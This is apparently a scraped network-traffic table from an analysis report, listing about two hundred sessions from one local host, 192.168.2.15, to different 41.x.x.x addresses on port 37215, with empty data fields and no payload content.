                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8107192.168.2.154577641.75.137.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8108192.168.2.155679641.197.183.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8109192.168.2.153807641.234.185.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8110192.168.2.154596441.200.246.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8111192.168.2.155503641.54.64.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8112192.168.2.154689641.93.118.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8113192.168.2.153579841.129.157.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8114192.168.2.154126641.93.45.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8115192.168.2.154060641.115.210.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8116192.168.2.153346441.12.69.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8117192.168.2.153398241.97.120.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8118192.168.2.155785641.205.112.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8119192.168.2.154760241.37.11.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8120192.168.2.155592641.129.178.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8121192.168.2.154265041.153.179.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8122192.168.2.155111641.86.120.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8123192.168.2.154024441.73.208.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8124192.168.2.154187241.221.163.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8125192.168.2.155165441.232.145.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8126192.168.2.155049641.136.170.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8127192.168.2.153684241.175.242.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8128192.168.2.155672841.32.47.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8129192.168.2.153648241.218.197.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8130192.168.2.155016441.202.74.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8131192.168.2.155742241.80.1.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8132192.168.2.153986641.203.13.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8133192.168.2.153774841.57.29.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8134192.168.2.155303641.201.66.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8135192.168.2.155321041.7.154.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8136192.168.2.155109841.86.179.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8137192.168.2.153733441.207.3.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8138192.168.2.155407441.14.187.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8139192.168.2.153360641.67.35.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8140192.168.2.154653041.36.157.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8141192.168.2.154620241.147.39.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8142192.168.2.155294841.64.210.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8143192.168.2.154078841.246.111.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8144192.168.2.154376641.190.45.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8145192.168.2.154878841.129.104.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8146192.168.2.155263641.72.195.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8147192.168.2.155074441.170.213.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8148192.168.2.155585841.15.124.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8149192.168.2.155337041.143.15.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8150192.168.2.153459041.109.179.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8151192.168.2.155897041.229.251.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8152192.168.2.153735041.177.156.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8153192.168.2.154855841.89.164.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8154192.168.2.155629841.97.65.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8155192.168.2.154452241.166.101.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8156192.168.2.156092241.219.176.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8157192.168.2.153462441.143.2.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8158192.168.2.155763841.82.251.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8159192.168.2.155211441.131.161.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8160192.168.2.155130441.112.160.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8161192.168.2.155860641.208.207.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8162192.168.2.155062441.42.241.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8163192.168.2.155651641.28.6.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8164192.168.2.154596841.251.47.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8165192.168.2.154213641.135.74.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8166192.168.2.154092441.208.142.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8167192.168.2.155055641.129.162.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8168192.168.2.156074041.86.120.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8169192.168.2.154798041.109.197.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8170192.168.2.153503241.98.100.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8171192.168.2.155270041.31.73.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8172192.168.2.153381841.147.206.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8173192.168.2.154714841.234.220.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8174192.168.2.155226841.228.248.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8175192.168.2.154457841.185.113.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8176192.168.2.155455441.132.236.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8177192.168.2.154303441.221.193.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8178192.168.2.156074641.253.184.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8179192.168.2.155599241.74.171.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8180192.168.2.154436641.74.195.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8181192.168.2.155342241.92.38.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8182192.168.2.153402241.235.208.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8183192.168.2.155048241.184.19.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8184192.168.2.154778241.238.137.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8185192.168.2.156086841.215.94.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8186192.168.2.154069441.245.70.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8187192.168.2.153281841.16.176.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8188192.168.2.154994641.100.184.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8189192.168.2.154312241.16.153.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8190192.168.2.153318441.100.40.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8191192.168.2.153599241.250.187.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8192192.168.2.155188241.254.152.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8193192.168.2.153776041.115.165.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8194192.168.2.154366041.107.78.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8195192.168.2.153395041.13.90.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8196192.168.2.155431041.163.248.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8197192.168.2.153427241.169.100.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8198192.168.2.155581241.129.202.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8199192.168.2.153642441.97.244.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8200192.168.2.153564841.201.24.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8201192.168.2.155651241.253.118.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8202192.168.2.154083641.140.181.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8203192.168.2.153883441.54.68.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8204192.168.2.155665241.160.8.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8205192.168.2.153584841.223.1.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8206192.168.2.153339641.203.111.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8207192.168.2.154849841.20.92.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8208192.168.2.154082241.105.247.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8209192.168.2.153547241.219.185.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8210192.168.2.153982641.150.211.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8211192.168.2.155543841.57.233.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8212192.168.2.155302241.231.252.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8213192.168.2.153447641.252.110.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8214192.168.2.154336841.149.242.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8215192.168.2.156063841.82.183.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8216192.168.2.153987241.171.87.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8217192.168.2.154741841.103.15.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8218192.168.2.153616641.122.165.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8219192.168.2.155753041.247.199.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8220192.168.2.153712241.162.219.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8221192.168.2.155586841.112.28.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8222192.168.2.154704841.191.151.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8223192.168.2.154613241.124.100.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8224192.168.2.154877241.105.253.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8225192.168.2.155115241.177.196.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8226192.168.2.155983441.169.4.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8227192.168.2.153796441.105.114.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8228192.168.2.155607041.176.153.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8229192.168.2.155186441.194.69.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8230192.168.2.154828841.141.116.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8231192.168.2.154396441.247.99.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8232192.168.2.155051841.224.226.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8233192.168.2.156088241.184.105.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8234192.168.2.155904641.232.247.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8235192.168.2.153279641.92.231.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8236192.168.2.154626641.60.228.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8237192.168.2.154585641.208.193.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8238192.168.2.155663441.162.241.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8239192.168.2.153769041.209.98.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8240192.168.2.155080441.36.17.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8241192.168.2.154243041.166.215.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8242192.168.2.154008641.139.53.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8243192.168.2.154212641.62.239.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8244192.168.2.154794841.41.93.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8245192.168.2.153920241.85.127.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8246192.168.2.155031041.204.215.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8247192.168.2.156082041.56.203.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8248192.168.2.153304841.130.77.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8249192.168.2.154120841.133.36.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8250192.168.2.154587441.248.215.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8251192.168.2.153928841.114.75.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8252192.168.2.154602041.23.170.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8253192.168.2.154532441.204.180.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8254192.168.2.154408441.235.137.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8255192.168.2.154743841.191.135.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8256192.168.2.155530441.132.165.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8257192.168.2.155852441.89.57.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8258192.168.2.153459641.159.232.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8259192.168.2.154958441.189.95.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8260192.168.2.155054241.217.249.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8261192.168.2.153331641.184.58.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8262192.168.2.154710441.20.135.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8263192.168.2.155033641.233.161.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8264192.168.2.155266241.221.82.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8265192.168.2.154039441.124.183.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8266192.168.2.153841041.49.47.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8267192.168.2.154612241.128.8.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8268192.168.2.153806441.212.92.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8269192.168.2.154881641.177.71.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8270192.168.2.155147241.29.159.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8271192.168.2.153938841.34.35.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8272192.168.2.155246041.85.105.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8273192.168.2.154328241.64.123.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8274192.168.2.153913641.156.73.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8275192.168.2.155203241.140.235.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8276192.168.2.154396041.24.2.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8277192.168.2.153739041.127.243.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8278192.168.2.153685641.103.113.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8279192.168.2.154315441.143.189.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8280192.168.2.155495841.47.84.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8281192.168.2.153990641.27.241.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8282192.168.2.153410441.97.97.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8283192.168.2.153542241.54.175.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8284192.168.2.156027641.102.198.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8285192.168.2.156094241.249.51.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8286192.168.2.155379841.224.237.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8287192.168.2.153547041.151.140.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8288192.168.2.154550041.194.4.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8289192.168.2.153717841.210.96.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8290192.168.2.153878841.69.213.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8291192.168.2.155194441.163.199.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8292192.168.2.155297041.41.94.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8293192.168.2.155275641.30.211.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8294192.168.2.155708641.89.154.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8295192.168.2.153680441.74.61.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8296192.168.2.156081441.92.63.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8297192.168.2.154871441.245.153.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8298192.168.2.154197841.238.85.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8299192.168.2.154870441.135.148.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8300192.168.2.153667841.49.41.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8301192.168.2.155493841.43.172.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8302192.168.2.153304641.230.12.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8303192.168.2.154572241.41.38.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8304192.168.2.154626041.155.234.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8305192.168.2.154602441.142.81.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8306192.168.2.155531441.32.205.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8307192.168.2.155121041.145.38.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8308192.168.2.155125841.145.108.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
